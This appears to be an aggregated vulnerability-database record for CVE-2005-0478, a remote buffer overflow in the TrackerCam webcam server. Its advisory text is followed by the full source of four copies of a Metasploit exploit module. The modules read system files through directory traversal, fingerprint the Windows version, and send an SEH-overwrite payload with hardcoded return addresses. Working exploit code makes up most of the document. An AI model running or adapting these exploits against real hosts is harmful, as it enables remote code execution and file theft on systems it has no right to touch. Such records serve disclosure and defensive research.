ID OSVDB:13952 Type osvdb Reporter Luigi Auriemma(aluigi@autistici.org) Modified 2005-02-18T13:57:12
Description
Vulnerability Description
A remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
A remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.
{"enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-04-28T13:20:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0478"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:36461", "PACKETSTORM:82949"]}, {"type": "osvdb", "idList": ["OSVDB:13953"]}, {"type": "exploitdb", "idList": ["EDB-ID:16811"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/TRACKERCAM_PHPARG_OVERFLOW"]}, {"type": "nessus", "idList": ["TRACKERCAM_MULTIPLE_VULNERABILITIES.NASL"]}], "modified": "2017-04-28T13:20:09", "rev": 2}, "vulnersScore": 7.4}, "bulletinFamily": "software", "affectedSoftware": [{"name": "TrackerCam", "operator": "eq", "version": "5.12"}], "references": [], "href": "https://vulners.com/osvdb/OSVDB:13952", "id": "OSVDB:13952", "title": "TrackerCam HTTP User-Agent Field Remote Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:09", "edition": 1, "reporter": "Luigi Auriemma(aluigi@autistici.org)", "description": "## Vulnerability Description\nA remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.trackercam.com\nSecurity Tracker: 1013238\n[Secunia Advisory ID:14344](https://secuniaresearch.flexerasoftware.com/advisories/14344/)\n[Related OSVDB ID: 13954](https://vulners.com/osvdb/OSVDB:13954)\n[Related OSVDB ID: 13958](https://vulners.com/osvdb/OSVDB:13958)\n[Related OSVDB ID: 13953](https://vulners.com/osvdb/OSVDB:13953)\n[Related OSVDB ID: 13957](https://vulners.com/osvdb/OSVDB:13957)\n[Related OSVDB ID: 13955](https://vulners.com/osvdb/OSVDB:13955)\n[Related OSVDB ID: 13956](https://vulners.com/osvdb/OSVDB:13956)\nOther Advisory URL: http://aluigi.altervista.org/adv/tcambof-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0388.html\n[CVE-2005-0478](https://vulners.com/cve/CVE-2005-0478)\n", "modified": "2005-02-18T13:57:12", "viewCount": 3, "published": "2005-02-18T13:57:12", "cvelist": ["CVE-2005-0478"]}
{"cve": [{"lastseen": "2020-12-09T19:22:18", "description": "Multiple buffer overflows in TrackerCam 5.12 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) an HTTP request with a long User-Agent header or (2) a long argument to an arbitrary PHP script.", "edition": 5, "cvss3": {}, "published": "2005-03-30T05:00:00", "title": "CVE-2005-0478", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0478"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:trackercam:trackercam:5.12"], "id": "CVE-2005-0478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0478", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:trackercam:trackercam:5.12:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:13:59", "description": "", "published": "2005-03-05T00:00:00", "type": "packetstorm", "title": "trackercam_phparg_overflow.pm", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2005-03-05T00:00:00", "id": "PACKETSTORM:36461", "href": "https://packetstormsecurity.com/files/36461/trackercam_phparg_overflow.pm.html", "sourceData": "` \n## \n# This file is part of the Metasploit Framework and may be redistributed \n# according to the licenses defined in the Authors field below. In the \n# case of an unknown or missing license, this file defaults to the same \n# license as the core Framework (dual GPLv2 and Artistic). The latest \n# version of the Framework can always be obtained from metasploit.com. \n## \n \npackage Msf::Exploit::trackercam_phparg_overflow; \nuse base \"Msf::Exploit\"; \nuse strict; \nuse Pex::Text; \n \nmy $advanced = { }; \n \nmy $info = \n{ \n'Name' => 'TrackerCam PHP Argument Buffer Overflow', \n'Version' => '$Revision: 1.3 $', \n'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ], \n'Arch' => [ 'x86' ], \n'OS' => [ 'win32'], \n'Priv' => 1, \n'AutoOpts' => { 'EXITFUNC' => 'thread' }, \n \n'UserOpts' => \n{ \n'RHOST' => [1, 'ADDR', 'The target address'], \n'RPORT' => [1, 'PORT', 'The target port', 8090], \n}, \n \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'Prepend' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # add esp, -3500 \n'Keys' => ['+ws2ord'], \n}, \n \n'Description' => Pex::Text::Freeform(qq{ \nThis module exploits a simple stack overflow in the TrackerCam web \nserver. All current versions of this software are vulnerable to a large \nnumber of security issues. This module abuses the directory traversal \nflaw to gain information about the system and then uses the PHP overflow \nto execute arbitrary code. \n}), \n \n'Refs' => \n[ \n['OSVDB', '13953'], \n['OSVDB', '13955'], \n['CVE', '2005-0478'], \n['BID', '12592'], \n['URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'], \n], \n \n'Targets' => \n[ \n# EyeWD.exe has a null and we can not use a partial overwrite. \n# All of the loaded application DLLs have a null in the address... \n# Except CPS.dl, which moves around between instances. \n \n# Windows XP SP2 and Windows 2003 are not supported yet :-/ \n \n['Windows 2000 English', 0x75022ac4 ], # ws2help.dll \n['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll \n['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll \n], \n \n'Keys' => ['trackercam'], \n}; \n \nsub new { \nmy $class = shift; \nmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); \nreturn($self); \n} \n \nsub Check { \nmy $self = shift; \nmy $s = $self->Connect; \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn $self->CheckCode('Connect'); \n} \n \n$self->PrintLine(\"[*] Querying the remote web server...\"); \n \nmy $path = \"/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3\"; \nmy $req = \"GET $path HTTP/1.0\\r\\n\\r\\n\"; \n \n$s->Send($req); \nmy $res = $s->Recv(-1, 5); \n$s->Close; \n \nif ($res =~ /fsockopen/) { \n$self->PrintLine(\"[*] Vulnerable TrackerCam instance discovered\"); \n$self->Fingerprint(); \nreturn $self->CheckCode('Confirmed'); \n} \n \n$self->PrintLine(\"[*] This TrackerCam service appears to be patched\"); \nreturn $self->CheckCode('Safe'); \n} \n \nsub Exploit { \nmy $self = shift; \nmy $target_idx = $self->GetVar('TARGET'); \nmy $shellcode = $self->GetVar('EncodedPayload')->Payload; \nmy $target = $self->Targets->[$target_idx]; \n \n$self->PrintLine(\"[*] Attempting to exploit target \" . $target->[0]); \n \nmy $s = $self->Connect; \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn; \n} \n \nmy $bang = Pex::Text::EnglishText(8192); \n \n# Simple as pie. \nsubstr($bang, 257, 4, pack('V', $target->[1])); \nsubstr($bang, 253, 2, \"\\xeb\\x06\"); \nsubstr($bang, 261, length($shellcode), $shellcode); \n \nmy $data = \"GET /tuner/TunerGuide.php3?userID=$bang HTTP/1.0\\r\\n\\r\\n\"; \n \n$self->PrintLine(\"[*] Sending \" .length($data) . \" bytes to remote host.\"); \n$s->Send($data); \n$s->Recv(-1, 5); \n \nreturn; \n} \n \n# Uses the directory traversal vulnerability to detect the remote OS version \nsub Fingerprint { \nmy $self = shift; \nmy $data = $self->DownloadFile('nobody.txt'); \n \nif (! $data ) { \n$self->PrintLine(\"[*] Download failed for remote test file\"); \nreturn; \n} \n \nmy ($path) = $data =~ m/in <b>(.*)<\\/b> on line/smi; \n$self->PrintLine(\"[*] Install path: $path\") if $path; \n \nif (uc(substr($path, 0, 1)) ne 'C') { \n$self->PrintLine(\"[*] TrackerCam is probably not installed on the system drive\"); \n} \n \nif ($data !~ /Program Files/) { \n$self->PrintLine(\"[*] TrackerCam is installed in a non-standard location\"); \n \n} \n \n$data = $self->DownloadFile('boot.ini'); \nif (! $data ) { \n$self->PrintLine(\"[*] Download failed for remote boot.ini file\"); \nreturn; \n} \n \n# Windows XP SP2 \nif ($data =~ /Windows XP.*NoExecute/i) { \n$self->PrintLine(\"[*] Detected Windows XP SP2\"); \nreturn 'WinXPSP2'; \n} \n \nif ($data =~ /Windows XP/) { \n$self->PrintLine(\"[*] Detected Windows XP SP0-SP1\"); \nreturn 'WinXPSP01'; \n} \n \nif ($data =~ /Windows.*2003/) { \n$self->PrintLine(\"[*] Detected Windows 2003 Server\"); \nreturn 'Win2003'; \n} \n \nif ($data =~ /Windows.*2000/) { \n$self->PrintLine(\"[*] Detected Windows 2000\"); \nreturn 'Win2000'; \n} \n \n$self->PrintLine(\"[*] Could not identify this system\"); \nreturn; \n} \n \nsub DownloadFile { \nmy $self = shift; \nmy $file = shift; \n \nmy $s = $self->Connect; \nreturn if $s->IsError; \n \nmy $path = \"/tuner/ComGetLogFile.php3?fn=../../../../../../../../../$file\"; \nmy $req = \"GET $path HTTP/1.0\\r\\n\\r\\n\"; \n \n$s->Send($req); \nmy $res = $s->Recv(8192, 5); \n$s->Close; \n \nreturn if ($res !~ /tuner\\.css/ || $res !~ /\\<pre\\>/ ); \n \nmy ($data) = $res =~ m/<pre>(.*)/smi; \n$data =~ s/<\\/pre><\\/body>.*//g if $data; \n \nreturn $res if ! $data; \nreturn $data; \n} \n \nsub Connect { \nmy $self = shift; \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $self->GetVar('RHOST'), \n'PeerPort' => $self->GetVar('RPORT'), \n'SSL' => $self->GetVar('SSL'), \n'LocalPort' => $self->GetVar('CPORT'), \n); \nreturn $s; \n} \n \n1; \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/36461/trackercam_phparg_overflow.pm"}, {"lastseen": "2016-12-05T22:12:18", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "TrackerCam PHP Argument Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82949", "href": "https://packetstormsecurity.com/files/82949/TrackerCam-PHP-Argument-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TrackerCam PHP Argument Buffer Overflow', \n'Description' => %q{ \nThis module exploits a simple stack overflow in the \nTrackerCam web server. All current versions of this software \nare vulnerable to a large number of security issues. This \nmodule abuses the directory traversal flaw to gain \ninformation about the system and then uses the PHP overflow \nto execute arbitrary code. \n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-0478'], \n[ 'OSVDB', '13953'], \n[ 'OSVDB', '13955'], \n[ 'BID', '12592'], \n[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'], \n \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# EyeWD.exe has a null and we can not use a partial overwrite. \n# All of the loaded application DLLs have a null in the address, \n# except CPS.dll, which moves around between instances :-( \n \n['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll \n['Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll \n['Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll \n \n# Windows XP SP2 and Windows 2003 are not supported yet :-/ \n], \n'DisclosureDate' => 'Feb 18 2005', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8090) \n], self.class) \nend \n \ndef check \nres = send_request_raw({ \n'uri' => '/tuner/ComGetLogFile.php3', \n'query' => 'fn=../HTTPRoot/socket.php3' \n}, 5) \n \nif (res and res.body =~ /fsockopen/) \nfp = fingerprint() \nprint_status(\"Detected a vulnerable TrackerCam installation on #{fp}\") \nreturn Exploit::CheckCode::Confirmed \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nc = connect \n \nbuf = rand_text_english(8192) \nseh = generate_seh_payload(target.ret) \nbuf[257, seh.length] = seh \n \nprint_status(\"Sending request...\") \nres = send_request_raw({ \n'uri' => '/tuner/TunerGuide.php3', \n'query' => 'userID=' + buf \n}, 5) \n \nhandler \nend \n \ndef download(path) \n \nres = send_request_raw({ \n'uri' => '/tuner/ComGetLogFile.php3', \n'query' => 'fn=' + (\"../\" * 10) + path \n}, 5) \n \nreturn if !(res and res.body and res.body =~ /tuner\\.css/ and res.body =~ /<pre>/) \n \nm = res.match(/<pre>(.*)<\\/pre><\\/body>/smi) \nreturn if not m \nreturn m[1] \nend \n \ndef fingerprint \n \nres = download(rand_text_alphanumeric(12) + '.txt') \nreturn if not res \n \nm = res.match(/in <b>(.*)<\\/b> on line/smi) \nreturn if not m \n \npath = m[1] \n \nprint_status(\"TrackerCam installation path is #{path}\") \n \nif (path !~ /^C/i) \nprint_status(\"TrackerCam is not installed on the system drive, we can't fingerprint it\") \nreturn \nend \n \nif (path !~ /Program Files/i) \nprint_status(\"TrackerCam is installed in a non-standard location\") \nend \n \nboot = download('boot.ini') \nreturn if not boot \n \ncase boot \nwhen /Windows XP.*NoExecute/i \nreturn \"Windows XP SP2+\" \nwhen /Windows XP/ \nreturn \"Windows XP SP0-SP1\" \nwhen /Windows.*2003/ \nreturn \"Windows 2003\" \nwhen /Windows.*2000/ \nreturn \"Windows 2000\" \nelse \nreturn \"Unknown OS/SP\" \nend \nend \n \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82949/trackercam_phparg_overflow.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "cvelist": ["CVE-2005-0478"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in TrackerCam. The server fails to validate arguments supplied to any PHP script resulting in a buffer overflow. With a specially crafted request, an attacker can potentially cause the execution of arbitrary code or crash the server process.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in TrackerCam. The server fails to validate arguments supplied to any PHP script resulting in a buffer overflow. With a specially crafted request, an attacker can potentially cause the execution of arbitrary code or crash the server process.\n## Manual Testing Notes\nhttp://[victim]:8090/MessageBoard/messages.php?aaaaaaaaaaa...aaaa\n## References:\nVendor URL: http://www.trackercam.com\nSecurity Tracker: 1013238\n[Secunia Advisory ID:14344](https://secuniaresearch.flexerasoftware.com/advisories/14344/)\n[Related OSVDB ID: 13954](https://vulners.com/osvdb/OSVDB:13954)\n[Related OSVDB ID: 13958](https://vulners.com/osvdb/OSVDB:13958)\n[Related OSVDB ID: 13957](https://vulners.com/osvdb/OSVDB:13957)\n[Related OSVDB ID: 13952](https://vulners.com/osvdb/OSVDB:13952)\n[Related OSVDB ID: 13955](https://vulners.com/osvdb/OSVDB:13955)\n[Related OSVDB ID: 13956](https://vulners.com/osvdb/OSVDB:13956)\nOther Advisory URL: http://aluigi.altervista.org/adv/tcambof-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0388.html\n[CVE-2005-0478](https://vulners.com/cve/CVE-2005-0478)\n", "modified": "2005-02-18T13:57:12", "published": "2005-02-18T13:57:12", "href": "https://vulners.com/osvdb/OSVDB:13953", "id": "OSVDB:13953", "title": "TrackerCam PHP Argument Remote Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:33:55", "description": "TrackerCam PHP Argument Buffer Overflow. CVE-2005-0478. Webapps exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "TrackerCam PHP Argument Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16811", "href": "https://www.exploit-db.com/exploits/16811/", "sourceData": "##\r\n# $Id: trackercam_phparg_overflow.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TrackerCam PHP Argument Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a simple stack buffer overflow in the\r\n\t\t\t\tTrackerCam web server. All current versions of this software\r\n\t\t\t\tare vulnerable to a large number of security issues. This\r\n\t\t\t\tmodule abuses the directory traversal flaw to gain\r\n\t\t\t\tinformation about the system and then uses the PHP overflow\r\n\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0478'],\r\n\t\t\t\t\t[ 'OSVDB', '13953'],\r\n\t\t\t\t\t[ 'OSVDB', '13955'],\r\n\t\t\t\t\t[ 'BID', '12592'],\r\n\t\t\t\t\t[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# EyeWD.exe has a null and we can not use a partial overwrite.\r\n\t\t\t\t\t# All of the loaded application DLLs have a null in the address,\r\n\t\t\t\t\t# except CPS.dll, which moves around between instances :-(\r\n\r\n\t\t\t\t\t['Windows 2000 English',\t\t{ 'Ret' => 0x75022ac4 }], # ws2help.dll\r\n\t\t\t\t\t['Windows XP English SP0/SP1',\t{ 'Ret' => 0x71aa32ad }], # ws2help.dll\r\n\t\t\t\t\t['Windows NT 4.0 SP4/SP5/SP6',\t{ 'Ret' => 0x77681799 }], # ws2help.dll\r\n\r\n\t\t\t\t\t# Windows XP SP2 and Windows 2003 are not supported yet :-/\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(8090)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/tuner/ComGetLogFile.php3',\r\n\t\t\t'query' => 'fn=../HTTPRoot/socket.php3'\r\n\t\t}, 5)\r\n\r\n\t\tif (res and res.body =~ /fsockopen/)\r\n\t\t\tfp = fingerprint()\r\n\t\t\tprint_status(\"Detected a vulnerable TrackerCam installation on #{fp}\")\r\n\t\t\treturn Exploit::CheckCode::Confirmed\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tc = connect\r\n\r\n\t\tbuf = rand_text_english(8192)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tbuf[257, seh.length] = seh\r\n\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/tuner/TunerGuide.php3',\r\n\t\t\t'query' => 'userID=' + buf\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef download(path)\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/tuner/ComGetLogFile.php3',\r\n\t\t\t'query' => 'fn=' + (\"../\" * 10) + path\r\n\t\t}, 5)\r\n\r\n\t\treturn if !(res and res.body and res.body =~ /tuner\\.css/ and res.body =~ /<pre>/)\r\n\r\n\t\tm = res.match(/<pre>(.*)<\\/pre><\\/body>/smi)\r\n\t\treturn if not m\r\n\t\treturn m[1]\r\n\tend\r\n\r\n\tdef fingerprint\r\n\r\n\t\tres = download(rand_text_alphanumeric(12) + '.txt')\r\n\t\treturn if not res\r\n\r\n\t\tm = res.match(/in <b>(.*)<\\/b> on line/smi)\r\n\t\treturn if not m\r\n\r\n\t\tpath = m[1]\r\n\r\n\t\tprint_status(\"TrackerCam installation path is #{path}\")\r\n\r\n\t\tif (path !~ /^C/i)\r\n\t\t\tprint_status(\"TrackerCam is not installed on the system drive, we can't fingerprint it\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif (path !~ /Program Files/i)\r\n\t\t\tprint_status(\"TrackerCam is installed in a non-standard location\")\r\n\t\tend\r\n\r\n\t\tboot = download('boot.ini')\r\n\t\treturn if not boot\r\n\r\n\t\tcase boot\r\n\t\t\twhen /Windows XP.*NoExecute/i\r\n\t\t\t\treturn \"Windows XP SP2+\"\r\n\t\t\twhen /Windows XP/\r\n\t\t\t\treturn \"Windows XP SP0-SP1\"\r\n\t\t\twhen /Windows.*2003/\r\n\t\t\t\treturn \"Windows 2003\"\r\n\t\t\twhen /Windows.*2000/\r\n\t\t\t\treturn \"Windows 2000\"\r\n\t\t\telse\r\n\t\t\t\treturn \"Unknown OS/SP\"\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16811/"}], "metasploit": [{"lastseen": "2020-08-12T23:59:09", "description": "This module exploits a simple stack buffer overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "TrackerCam PHP Argument Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2017-08-14T05:40:17", "id": "MSF:EXPLOIT/WINDOWS/HTTP/TRACKERCAM_PHPARG_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TrackerCam PHP Argument Buffer Overflow',\n 'Description' => %q{\n This module exploits a simple stack buffer overflow in the\n TrackerCam web server. All current versions of this software\n are vulnerable to a large number of security issues. This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0478'],\n [ 'OSVDB', '13953'],\n [ 'OSVDB', '13955'],\n [ 'BID', '12592'],\n [ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # EyeWD.exe has a null and we can not use a partial overwrite.\n # All of the loaded application DLLs have a null in the address,\n # except CPS.dll, which moves around between instances :-(\n\n ['Windows 2000 English',\t\t{ 'Ret' => 0x75022ac4 }], # ws2help.dll\n ['Windows XP English SP0/SP1',\t{ 'Ret' => 0x71aa32ad }], # ws2help.dll\n ['Windows NT 4.0 SP4/SP5/SP6',\t{ 'Ret' => 0x77681799 }], # ws2help.dll\n\n # Windows XP SP2 and Windows 2003 are not supported yet :-/\n ],\n 'DisclosureDate' => 'Feb 18 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8090)\n ])\n end\n\n def check\n res = send_request_raw({\n 'uri' => '/tuner/ComGetLogFile.php3',\n 'query' => 'fn=../HTTPRoot/socket.php3'\n }, 5)\n\n if (res and res.body =~ /fsockopen/)\n fp = fingerprint()\n vprint_status(\"Detected a vulnerable TrackerCam installation on #{fp}\")\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n c = connect\n\n buf = rand_text_english(8192)\n seh = generate_seh_payload(target.ret)\n buf[257, seh.length] = seh\n\n print_status(\"Sending request...\")\n res = send_request_raw({\n 'uri' => '/tuner/TunerGuide.php3',\n 'query' => 'userID=' + buf\n }, 5)\n\n handler\n end\n\n def download_log(path)\n\n res = send_request_raw({\n 'uri' => '/tuner/ComGetLogFile.php3',\n 'query' => 'fn=' + (\"../\" * 10) + path\n }, 5)\n\n return if !(res and res.body and res.body =~ /tuner\\.css/ and res.body =~ /<pre>/)\n\n m = res.match(/<pre>(.*)<\\/pre><\\/body>/smi)\n return if not m\n return m[1]\n end\n\n def fingerprint\n\n res = download_log(rand_text_alphanumeric(12) + '.txt')\n return if not res\n\n m = res.match(/in <b>(.*)<\\/b> on line/smi)\n return if not m\n\n path = m[1]\n\n print_status(\"TrackerCam installation path is #{path}\")\n\n if (path !~ /^C/i)\n print_status(\"TrackerCam is not installed on the system drive, we can't fingerprint it\")\n return\n end\n\n if (path !~ /Program Files/i)\n print_status(\"TrackerCam is installed in a non-standard location\")\n end\n\n boot = download_log('boot.ini')\n return if not boot\n\n case boot\n when /Windows XP.*NoExecute/i\n return \"Windows XP SP2+\"\n when /Windows XP/\n return \"Windows XP SP0-SP1\"\n when /Windows.*2003/\n return \"Windows 2003\"\n when /Windows.*2000/\n return \"Windows 2000\"\n else\n return \"Unknown OS/SP\"\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/trackercam_phparg_overflow.rb"}], "nessus": [{"lastseen": "2021-01-20T15:18:48", "description": "The remote host is running TrackerCam, a HTTP software that allows a\nuser to publish a webcam feed thru a website.\n\nThe remote version of this software is affected by multiple\nvulnerabilities :\n\n - Buffer overflows which may allow an attacker to execute\n arbitrary code on the remote host.\n\n - A directory traversal bug that may allow an attacker to\n read arbitrary files on the remote host with the \n privileges of the web server daemon.\n\n - A cross-site scripting issue that may allow an attacker\n to use the remote host to perform a cross-site scripting\n 